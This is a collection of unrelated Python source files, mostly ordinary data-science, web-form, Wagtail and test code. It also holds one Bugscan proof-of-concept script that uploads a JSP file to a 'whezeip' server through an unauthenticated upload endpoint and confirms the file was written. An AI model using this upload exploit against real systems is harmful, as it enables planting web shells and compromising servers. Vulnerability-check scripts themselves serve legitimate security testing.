tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
return tokenizer
def load_wn_senses(path):
wn_senses = {}
with open(path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split('\t')
lemma = line[0]
pos = line[1]
senses = line[2:]
key = generate_key(lemma, pos)
wn_senses[key] = senses
return wn_senses
def get_label_space(data):
#get set of labels from dataset
labels = set()
for sent in data:
for _, _, _, _, label in sent:
if label != -1:
labels.add(label)
labels = list(labels)
labels.sort()
labels.append('n/a')
label_map = {}
for sent in data:
for _, lemma, pos, _, label in sent:
if label != -1:
key = generate_key(lemma, pos)
label_idx = labels.index(label)
if key not in label_map: label_map[key] = set()
label_map[key].add(label_idx)
return labels, label_map
def process_encoder_outputs(output, mask, as_tensor=False):
combined_outputs = []
position = -1
avg_arr = []
for idx, rep in zip(mask, torch.split(output, 1, dim=0)):
#ignore unlabeled words
if idx == -1: continue
#average representations for units in same example
elif position < idx:
position=idx
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
avg_arr = [rep]
else:
assert position == idx
avg_arr.append(rep)
#get last example from avg_arr
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
if as_tensor: return torch.cat(combined_outputs, dim=0)
else: return combined_outputs
#run WSD Evaluation Framework scorer within python
def evaluate_output(scorer_path, gold_filepath, out_filepath):
eval_cmd = ['java','-cp', scorer_path, 'Scorer', gold_filepath, out_filepath]
output = subprocess.Popen(eval_cmd, stdout=subprocess.PIPE ).communicate()[0]
output = [x.decode("utf-8") for x in output.splitlines()]
p,r,f1 = [float(output[i].split('=')[-1].strip()[:-1]) for i in range(3)]
return p, r, f1
def load_data(datapath, name):
text_path = os.path.join(datapath, '{}.data.xml'.format(name))
gold_path = os.path.join(datapath, '{}.gold.key.txt'.format(name))
#load gold labels
gold_labels = {}
with open(gold_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split(' ')
instance = line[0]
#this means we are ignoring other senses if labeled with more than one
#(happens at least in SemCor data)
key = line[1]
gold_labels[instance] = key
#load train examples + annotate sense instances with gold labels
sentences = []
s = []
with open(text_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip()
if line == '</sentence>':
sentences.append(s)
s=[]
elif line.startswith('<instance') or line.startswith('<wf'):
word = re.search('>(.+?)<', line).group(1)
lemma = re.search('lemma="(.+?)"', line).group(1)
pos = re.search('pos="(.+?)"', line).group(1)
#clean up data
word = re.sub(''', '\'', word)
lemma = re.sub(''', '\'', lemma)
sense_inst = -1
sense_label = -1
if line.startswith('<instance'):
sense_inst = re.search('instance id="(.+?)"', line).group(1)
#annotate sense instance with gold label
sense_label = gold_labels[sense_inst]
s.append((word, lemma, pos, sense_inst, sense_label))
return sentences
#normalize ids list, masks to whatever the passed in length is
def normalize_length(ids, attn_mask, o_mask, max_len, pad_id):
if max_len == -1:
return ids, attn_mask, o_mask
else:
if len(ids) < max_len:
while len(ids) < max_len:
ids.append(torch.tensor([[pad_id]]))
attn_mask.append(0)
o_mask.append(-1)
else:
ids = ids[:max_len-1]+[ids[-1]]
attn_mask = attn_mask[:max_len]
o_mask = o_mask[:max_len]
assert len(ids) == max_len
assert len(attn_mask) == max_len
assert len(o_mask) == max_len
return ids, attn_mask, o_mask
#filters down training dataset to (up to) k examples per sense
#for few-shot learning of the model
def filter_k_examples(data, k):
#shuffle data so we don't only get examples for (common) senses from beginning
random.shuffle(data)
#track number of times sense from data is used
sense_dict = {}
#store filtered data
filtered_data = []
example_count = 0
for sent in data:
filtered_sent = []
for form, lemma, pos, inst, sense in sent:
#treat unlabeled words normally
if sense == -1:
x = (form, lemma, pos, inst, sense)
elif sense in sense_dict:
if sense_dict[sense] < k:
#increment sense count and add example to filtered data
sense_dict[sense] += 1
x = (form, lemma, pos, inst, sense)
example_count += 1
else: #if the data already has k examples of this sense
#add example with no instance or sense label to data
x = (form, lemma, pos, -1, -1)
else:
#add labeled example to filtered data and sense dict
sense_dict[sense] = 1
x = (form, lemma, pos, inst, sense)
example_count += 1
filtered_sent.append(x)
filtered_data.append(filtered_sent)
print("k={}, training on {} sense examples...".format(k, example_count))
return filtered_data
#EOF
| 1.664063 | 2 |
examples/dehydrogenation/3-property-mappings/mappings_from_ontology/run_w_onto.py | TorgeirUstad/dlite | 0 | 6912 | #!/usr/bin/env python3
from typing import Dict, AnyStr
from pathlib import Path
from ontopy import get_ontology
import dlite
from dlite.mappings import make_instance
# Setup dlite paths
thisdir = Path(__file__).parent.absolute()
rootdir = thisdir.parent.parent
workflow1dir = rootdir / '1-simple-workflow'
entitiesdir = rootdir / 'entities'
atomdata = workflow1dir / 'atomscaledata.json'
dlite.storage_path.append(f'{entitiesdir}/*.json')
# Define the calculation
def get_energy(reaction):
"""Calculates reaction energies with data from Substance entity
data is harvested from collection and mapped to Substance according to
mappings.
Args:
reaction: dict with names of reactants and products ase keys
and stochiometric coefficient as value
Negative stochiometric coefficients for reactants.
Positive stochiometric coefficients for products.
Returns:
reaction energy
"""
energy = 0
for label, n in reaction.items():
inst = make_instance(Substance, coll[label], mappings,
mapsTo=mapsTo)
energy+=n*inst.molecule_energy
return energy
# Import ontologies with mappings
molecules_onto = get_ontology(f'{thisdir}/mapping_mols.ttl').load()
reaction_onto = get_ontology(f'{thisdir}/mapping_substance.ttl').load()
# Convert to mappings to a single list of triples
mappings = list(molecules_onto.get_unabbreviated_triples())
mappings.extend(list(reaction_onto.get_unabbreviated_triples()))
# Obtain the Metadata to be mapped to each other
Molecule = dlite.get_instance('http://onto-ns.com/meta/0.1/Molecule')
Substance = dlite.get_instance('http://onto-ns.com/meta/0.1/Substance')
# Find mapping relation
# TODO: investigate what to do if the two cases
# use a different mappings relation. As of now it is a
# hard requirement that they use the same.
mapsTo = molecules_onto.mapsTo.iri
# Define where the molecule data is obtained from
# This is a dlite collection
coll = dlite.Collection(f'json://{atomdata}?mode=r#molecules', 0)
# input from chemical engineer, e.g. what are reactants and products
# reactants (left side of equation) have negative stochiometric coefficient
# products (right side of equation) have positive stochiometric coefficient
reaction1 = {'C2H6':-1, 'C2H4':1,'H2':1}
reaction_energy = get_energy(reaction1)
print('Reaction energy 1', reaction_energy)
reaction2 = {'C3H8':-1, 'H2': -2,'CH4':3}
reaction_energy2 = get_energy(reaction2)
print('Reaction energy 1', reaction_energy2)
# Map instance Molecule with label 'H2' to Substance
#inst = make_instance(Substance, coll['H2'], mappings)
#print(inst)
# Map instance Molecule with label 'H2' to itself
#inst2 = make_instance(Molecule, coll['H2'], mappings, strict=False)
#print(inst2)
| 2.640625 | 3 |
forms.py | lendoo73/my_idea_boxes | 0 | 6913 | <filename>forms.py<gh_stars>0
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField
from wtforms.fields.html5 import DateField, IntegerField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange
from models import Colleagues, Admins, Boxes, Ideas
class RegistrationFormCompany(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
founder_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
repeat_founder_password = PasswordField(
"Repeat Your Password",
validators = [DataRequired(),
EqualTo("founder_password")]
)
joining_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
repeat_joining_password = PasswordField(
"Repeat Joining Password",
validators = [DataRequired(),
EqualTo("joining_password")]
)
submit = SubmitField("Register your Company")
class RegistrationFormColleague(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
joining_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
password = PasswordField("Your Password", validators = [DataRequired()])
repeat_password = PasswordField(
"Repeat Password",
validators = [DataRequired(),
EqualTo("password")]
)
submit = SubmitField("Register")
class LoginForm(FlaskForm):
email_or_user_name = StringField("Email or User name", validators = [DataRequired()])
password = PasswordField("Password", validators = [DataRequired()])
remember_me = BooleanField("Remember Me")
submit = SubmitField("Sign In")
class ConfirmEmailForm(FlaskForm):
email = HiddenField("Email")
code = IntegerField(
"Confirmation code",
validators = [
DataRequired(),
NumberRange(
min = 100000,
max = 999999,
message = "Please enter the 6 digits you received in the email."
)
]
)
submit = SubmitField("Confirm my Email")
class UpdateFirstNameForm(FlaskForm):
first_name = StringField("First Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateLastNameForm(FlaskForm):
last_name = StringField("Last Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateEmailForm(FlaskForm):
email = StringField("Email", validators = [DataRequired(), Email()])
password = PasswordField("Password", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePositionForm(FlaskForm):
position = StringField("Your Position", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePasswordForm(FlaskForm):
password = PasswordField("<PASSWORD>", validators = [DataRequired()])
new_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat your New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
allowed_format = ['png', 'svg', 'jpg', "jpeg"]
class UpdateAvatarForm(FlaskForm):
avatar = FileField(
"Choose an Avatar:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Avatar")
class DeleteColleagueForm(FlaskForm):
password = PasswordField("Your Password", validators = [DataRequired()])
submit = SubmitField("Delete Registration")
class UpdateLogoForm(FlaskForm):
logo = FileField(
"Choose your Company Logo:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Logo")
class UpdateCompanyNameForm(FlaskForm):
company_name = StringField("Company Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateJoiningPasswordForm(FlaskForm):
password = PasswordField("<PASSWORD>", validators = [DataRequired()])
new_password = PasswordField("New Joining Password", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
class UpdatePrivilegsForm(FlaskForm):
update_company = BooleanField("Update Company")
update_privilegs = BooleanField("Update Privilegs")
update_colleague = BooleanField("Update Colleague")
update_box = BooleanField("Update Idea Box")
password = PasswordField("<PASSWORD>", validators = [DataRequired()])
submit = SubmitField("Update Privilegs")
class CreateBoxForm(FlaskForm):
name = StringField("Title", validators = [DataRequired()])
description = TextAreaField("Description", validators = [DataRequired()])
close_at = DateField("Close at", format = "%Y-%m-%d")
submit = SubmitField("Create Box")
class CreateIdeaForm(FlaskForm):
idea = TextAreaField("My Idea", validators= [DataRequired()])
sign = RadioField(
"Sign",
choices = [
("incognito", "incognito"),
("username", "username"),
("first name", "first name"),
("full name", "full name")
]
)
submit = SubmitField("Share my Idea") | 2.65625 | 3 |
5.analysis/scikit-multilearn-master/skmultilearn/adapt/brknn.py | fullmooncj/textmining_edu | 0 | 6914 | <reponame>fullmooncj/textmining_edu<filename>5.analysis/scikit-multilearn-master/skmultilearn/adapt/brknn.py
from builtins import range
from ..base import MLClassifierBase
from ..utils import get_matrix_in_format
from sklearn.neighbors import NearestNeighbors
import scipy.sparse as sparse
import numpy as np
class BinaryRelevanceKNN(MLClassifierBase):
"""Binary Relevance adapted kNN Multi-Label Classifier."""
def __init__(self, k = 10):
super(BinaryRelevanceKNN, self).__init__()
self.k = k # Number of neighbours
self.copyable_attrs = ['k']
def fit(self, X, y):
"""Fit classifier with training data
Internally this method uses a sparse CSC representation for y
(:py:class:`scipy.sparse.csc_matrix`).
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:param y: binary indicator matrix with label assignments
:type y: dense or sparse matrix of {0, 1} (n_samples, n_labels)
:returns: Fitted instance of self
"""
self.train_labelspace = get_matrix_in_format(y, 'csc')
self.num_instances = self.train_labelspace.shape[0]
self.num_labels = self.train_labelspace.shape[1]
self.knn = NearestNeighbors(self.k).fit(X)
return self
def compute_confidences(self):
# % of neighbours that have a given label assigned
# sum over each label columns after subsetting for neighbours
# and normalize
self.confidences = np.vstack([self.train_labelspace[n,:].tocsc().sum(axis=0) / float(self.num_labels) for n in self.neighbors])
return self.confidences
def predict(self, X):
"""Predict labels for X
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:returns: binary indicator matrix with label assignments
:rtype: sparse matrix of int (n_samples, n_labels)
"""
self.neighbors = self.knn.kneighbors(X, self.k, return_distance=False)
self.compute_confidences()
return self.predict_variant(X)
class BRkNNaClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the labels that are assigned to at least half of the neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
# TODO: find out if moving the sparsity to compute confidences boots speed
return sparse.csr_matrix(np.rint(self.confidences), dtype='i8')
class BRkNNbClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the most popular m labels of the neighbors, where m is the
average number of labels assigned to the object's neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
self.avg_labels = [int(np.average(self.train_labelspace[n,:].sum(axis=1)).round()) for n in self.neighbors]
prediction = sparse.lil_matrix((X.shape[0], self.num_labels), dtype='i8')
top_labels = np.argpartition(self.confidences, kth=min(self.avg_labels, len(self.confidences[0])), axis=1).tolist()
for i in range(X.shape[0]):
for j in top_labels[i][-self.avg_labels[i]:]:
prediction[i,j] += 1
return prediction | 2.75 | 3 |
groclient/constants.py | eric-gro/api-client | 18 | 6915 | """Constants about the Gro ontology that can be imported and re-used anywhere."""
REGION_LEVELS = {
'world': 1,
'continent': 2,
'country': 3,
'province': 4, # Equivalent to state in the United States
'district': 5, # Equivalent to county in the United States
'city': 6,
'market': 7,
'other': 8,
'coordinate': 9
}
ENTITY_TYPES_PLURAL = ['metrics', 'items', 'regions', 'frequencies', 'sources', 'units']
DATA_SERIES_UNIQUE_TYPES_ID = [
'metric_id',
'item_id',
'region_id',
'partner_region_id',
'frequency_id',
'source_id'
]
ENTITY_KEY_TO_TYPE = {
'metric_id': 'metrics',
'item_id': 'items',
'region_id': 'regions',
'partner_region_id': 'regions',
'source_id': 'sources',
'frequency_id': 'frequencies',
'unit_id': 'units'
}
DATA_POINTS_UNIQUE_COLS = DATA_SERIES_UNIQUE_TYPES_ID + [
'reporting_date',
'start_date',
'end_date'
]
| 1.679688 | 2 |
asv_bench/benchmarks/tslibs/period.py | CitizenB/pandas | 6 | 6916 | """
Period benchmarks that rely only on tslibs. See benchmarks.period for
Period benchmarks that rely on other parts fo pandas.
"""
from pandas import Period
from pandas.tseries.frequencies import to_offset
class PeriodProperties:
params = (
["M", "min"],
[
"year",
"month",
"day",
"hour",
"minute",
"second",
"is_leap_year",
"quarter",
"qyear",
"week",
"daysinmonth",
"dayofweek",
"dayofyear",
"start_time",
"end_time",
],
)
param_names = ["freq", "attr"]
def setup(self, freq, attr):
self.per = Period("2012-06-01", freq=freq)
def time_property(self, freq, attr):
getattr(self.per, attr)
class PeriodUnaryMethods:
params = ["M", "min"]
param_names = ["freq"]
def setup(self, freq):
self.per = Period("2012-06-01", freq=freq)
def time_to_timestamp(self, freq):
self.per.to_timestamp()
def time_now(self, freq):
self.per.now(freq)
def time_asfreq(self, freq):
self.per.asfreq("A")
class PeriodConstructor:
params = [["D"], [True, False]]
param_names = ["freq", "is_offset"]
def setup(self, freq, is_offset):
if is_offset:
self.freq = to_offset(freq)
else:
self.freq = freq
def time_period_constructor(self, freq, is_offset):
Period("2012-06-01", freq=freq)
| 2.6875 | 3 |
Bugscan_exploits-master/exp_list/exp-1788.py | csadsl/poc_exp | 11 | 6917 | <reponame>csadsl/poc_exp
#/usr/bin/python
#-*- coding: utf-8 -*-
#Refer http://www.wooyun.org/bugs/wooyun-2015-0137140
#__Author__ = 上善若水
#_PlugName_ = whezeip Plugin
#_FileName_ = whezeip.py
def assign(service, arg):
if service == "whezeip":
return True, arg
def audit(arg):
raw = '''
POST /defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 127.0.0.1/defaultroot/customize/formClassUpload.jsp
Cookie: LocLan=zh_cn; JSESSIONID=zXP1WqCc0h80FSvJNVdnj1fGpTJfh2GphR5GYJnJGLLKKKtJdGJN!-668245681
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------11327923318636
Content-Length: 328
-----------------------------11327923318636
Content-Disposition: form-data; name="photo"; filename="testvul.jsp"
Content-Type: application/octet-stream
testvul_uploadfile_test
-----------------------------11327923318636
Content-Disposition: form-data; name="submit"
ä¸ä¼
-----------------------------11327923318636--
'''
url = arg + 'defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null'
# proxy=('127.0.0.1',1234)
# code, head,res, errcode, _ = curl.curl2(url,proxy=proxy,raw=raw)
code1, head1, res1, errcode1, _url1 = curl.curl2(url,raw=raw)
shell_path = 'defaultroot/devform/customize/' + 'testvul.jsp'
code2, head2, res2, errcode2, _url2 = curl.curl2(arg+shell_path)
if code2 == 200 and 'testvul_uploadfile_test' in res2:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('whezeip', 'http://172.16.31.10:7001/')[1]) | 1.789063 | 2 |
3-working-with-lists/zip_tuples.py | thecodingsim/learn-python | 0 | 6918 | <reponame>thecodingsim/learn-python
# Use zip() to create a new variable called names_and_dogs_names that combines owners and dogs_names lists into a zip object.
# Then, create a new variable named list_of_names_and_dogs_names by calling the list() function on names_and_dogs_names.
# Print list_of_names_and_dogs_names.
owners = ["Jenny", "Alexus", "Sam", "Grace"]
dogs_names = ["Elphonse", "Dr. Doggy DDS", "Carter", "Ralph"]
names_and_dogs_names = zip(owners, dogs_names)
list_of_names_and_dogs_names = list(names_and_dogs_names)
print(list_of_names_and_dogs_names) | 4.4375 | 4 |
setup.py | abhiomkar/couchdbkit | 1 | 6919 | # -*- coding: utf-8 -
#
# This file is part of couchdbkit released under the MIT license.
# See the NOTICE for more information.
import os
import sys
if not hasattr(sys, 'version_info') or sys.version_info < (2, 5, 0, 'final'):
raise SystemExit("couchdbkit requires Python 2.5 or later.")
from setuptools import setup, find_packages
from couchdbkit import __version__
setup(
name = 'couchdbkit',
version = __version__,
description = 'Python couchdb kit',
long_description = file(
os.path.join(
os.path.dirname(__file__),
'README.rst'
)
).read(),
author = '<NAME>',
author_email = '<EMAIL>',
license = 'Apache License 2',
url = 'http://couchdbkit.org',
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Database',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages = find_packages(exclude=['tests']),
zip_safe = False,
install_requires = [
'restkit>=3.2',
],
entry_points="""
[couchdbkit.consumers]
sync=couchdbkit.consumer.sync:SyncConsumer
eventlet=couchdbkit.consumer.ceventlet:EventletConsumer
gevent=couchdbkit.consumer.cgevent:GeventConsumer
""",
test_suite='noses',
)
| 1.445313 | 1 |
tests/integration/test_infrastructure_persistence.py | othercodes/sample-todo-list-hexagonal-achitecture | 0 | 6920 | <reponame>othercodes/sample-todo-list-hexagonal-achitecture<gh_stars>0
from typing import Optional
from complexheart.domain.criteria import Criteria
from sqlalchemy import create_engine
from sqlalchemy.engine import Engine
from sqlalchemy.orm import sessionmaker
from to_do_list.tasks.domain.models import Task
from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller
db_engine: Optional[Engine] = None
def setup_function():
global db_engine
db_engine = create_engine('sqlite:///:memory:')
DBInstaller(db_engine).install()
def test_repository_should_save_new_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert session.query(Task).get(task.id)
def test_repository_should_find_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert repository.find(task.id)
def test_repository_should_match_task_by_criteria_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(11):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.match(
Criteria() \
.filter('description', 'like', '%task 1%') \
.order_by(['id'])
)
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 2
def test_repository_should_get_all_tasks_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(10):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.all()
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 10
| 2.09375 | 2 |
wagtail_jinja2/extensions.py | minervaproject/wagtail-jinja2-extensions | 6 | 6921 | <filename>wagtail_jinja2/extensions.py
from jinja2.ext import Extension
from jinja2 import nodes
from jinja2 import Markup
from wagtail.wagtailadmin.templatetags.wagtailuserbar import wagtailuserbar as original_wagtailuserbar
from wagtail.wagtailimages.models import Filter, SourceImageIOError
class WagtailUserBarExtension(Extension):
tags = set(['wagtailuserbar'])
def parse(self, parser):
call = self.call_method('_render', args=[nodes.ContextReference()])
return nodes.Output([nodes.MarkSafe(call)]).set_lineno(next(parser.stream).lineno)
def _render(self, context):
return Markup(original_wagtailuserbar(context))
class WagtailImagesExtension(Extension):
tags = set(['image'])
def parse(self, parser):
lineno = next(parser.stream).lineno
image_expr = parser.parse_expression()
filter_spec = parser.parse_expression()
if parser.stream.skip_if('name:as'):
output_var_name = parser.parse_expression()
output_var_name = nodes.Const(output_var_name.name)
else:
output_var_name = nodes.Const(None)
if output_var_name.value is not None:
return nodes.Assign(nodes.Name(output_var_name.value, 'store'),
self.call_method('_render', [image_expr, filter_spec, output_var_name]))
else:
return nodes.Output([
self.call_method('_render', [image_expr, filter_spec, output_var_name])
]).set_lineno(lineno)
def filter(self, filter_spec):
_filter, _ = Filter.objects.get_or_create(spec=filter_spec)
return _filter
def _render(self, image, filter_spec, output_var_name=None):
if not image:
return ''
try:
rendition = image.get_rendition(self.filter(filter_spec))
except SourceImageIOError:
# It's fairly routine for people to pull down remote databases to their
# local dev versions without retrieving the corresponding image files.
# In such a case, we would get a SourceImageIOError at the point where we try to
# create the resized version of a non-existent image. Since this is a
# bit catastrophic for a missing image, we'll substitute a dummy
# Rendition object so that we just output a broken link instead.
Rendition = image.renditions.model # pick up any custom Image / Rendition classes that may be in use
rendition = Rendition(image=image, width=0, height=0)
rendition.file.name = 'not-found'
if output_var_name:
# store the rendition object in the given variable
return rendition
else:
# render the rendition's image tag now
# resolved_attrs = {}
# for key in self.attrs:
# resolved_attrs[key] = self.attrs[key].resolve(context)
return rendition.img_tag({})
| 2.125 | 2 |
rta/provision/__init__.py | XiaoguTech/rta-sandbox | 0 | 6922 | from rta.provision.utils import *
from rta.provision.passwd import *
from rta.provision.influxdb import *
from rta.provision.grafana import *
from rta.provision.kapacitor import *
| 1.0625 | 1 |
nn_dataflow/tests/unit_test/test_network.py | Pingziwalk/nn_dataflow | 170 | 6923 | """ $lic$
Copyright (C) 2016-2020 by Tsinghua University and The Board of Trustees of
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
import unittest
from nn_dataflow.core import Network
from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, \
PoolingLayer, EltwiseLayer
class TestNetwork(unittest.TestCase):
''' Tests for Network. '''
# pylint: disable=too-many-public-methods
def setUp(self):
''' Set up. '''
self.network = Network('test_net')
self.network.set_input_layer(InputLayer(3, 224))
self.network.add('c1', ConvLayer(3, 64, 224, 3))
self.network.add('p1', PoolingLayer(64, 7, 32))
self.network.add('f1', FCLayer(64, 1000, 7))
def test_set_input_layer(self):
''' Modifier set_input_layer. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
self.assertIsInstance(network.input_layer(), InputLayer)
self.assertEqual(network.input_layer().nofm, 3)
self.assertEqual(network.input_layer().hofm, 24)
self.assertEqual(network.input_layer().wofm, 24)
self.assertEqual(len(network), 0)
def test_set_input_layer_type(self):
''' Modifier set_input_layer type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(ConvLayer(3, 8, 24, 3))
def test_set_input_layer_duplicate(self):
''' Modifier set_input_layer duplicate. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
with self.assertRaisesRegex(KeyError, 'Network: .*input.*'):
network.set_input_layer(InputLayer(3, 24))
def test_add(self):
''' Modifier add. '''
self.assertEqual(len(self.network), 3)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_add_same_key(self):
''' Modifier add same key. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*c1.*'):
network.add('c1', ConvLayer(64, 128, 224, 3))
def test_add_no_input(self):
''' Modifier add no input. '''
network = Network('test_net')
with self.assertRaisesRegex(RuntimeError, 'Network: .*input.*'):
network.add('c1', ConvLayer(3, 64, 224, 3))
def test_add_no_prev(self):
''' Modifier add no prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*prev.*p1.*'):
network.add('p1', PoolingLayer(64, 7, 32), prevs='p1')
def test_add_invalid_type(self):
''' Modifier add invalid type. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaisesRegex(TypeError, 'Network: .*Layer.*'):
network.add('c1', (3, 64, 224, 3))
def test_add_unmatch_prev(self):
''' Modifier add unmatch prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*p1.*mismatch fmap.*'):
network.add('p1', PoolingLayer(64, 7, 2))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*c2.*mismatch fmap.*'):
network.add('c2', ConvLayer(64, 128, 220, 3))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*p1.*'):
network.add('p1', PoolingLayer(32, 7, 32))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*c2.*'):
network.add('c2', ConvLayer(32, 128, 224, 3))
self.assertEqual(len(network), 1)
network.add('c2', ConvLayer(64, 128, 224, 3))
with self.assertRaisesRegex(ValueError,
r'Network: .*c1 | c2.*prev.*p1.*'):
network.add('p1', PoolingLayer(128, 7, 32), prevs=('c1', 'c2'))
self.assertEqual(len(network), 2)
def test_add_ext(self):
''' Modifier add_ext. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 24))
self.assertIsInstance(self.network['e0'], InputLayer)
self.assertEqual(self.network['e0'].nofm, 3)
self.assertEqual(self.network['e0'].hofm, 24)
self.assertEqual(self.network['e0'].wofm, 24)
self.network.add_ext('e1', InputLayer(5, (16, 20)))
self.assertIsInstance(self.network['e1'], InputLayer)
self.assertEqual(self.network['e1'].nofm, 5)
self.assertEqual(self.network['e1'].hofm, 16)
self.assertEqual(self.network['e1'].wofm, 20)
self.assertEqual(len(self.network), 3)
def test_add_ext_same_key(self):
''' Modifier add_ext same key. '''
network = Network('test_net')
network.add_ext('e0', InputLayer(3, 24))
with self.assertRaisesRegex(KeyError, 'Network: .*ext.*'):
network.add_ext('e0', InputLayer(3, 24))
def test_add_ext_invalid_type(self):
''' Modifier add_ext invalid type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', ConvLayer(3, 8, 24, 3))
def test_prevs(self):
''' Get prevs. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
prevs = self.network.prevs('f1')
self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f2')
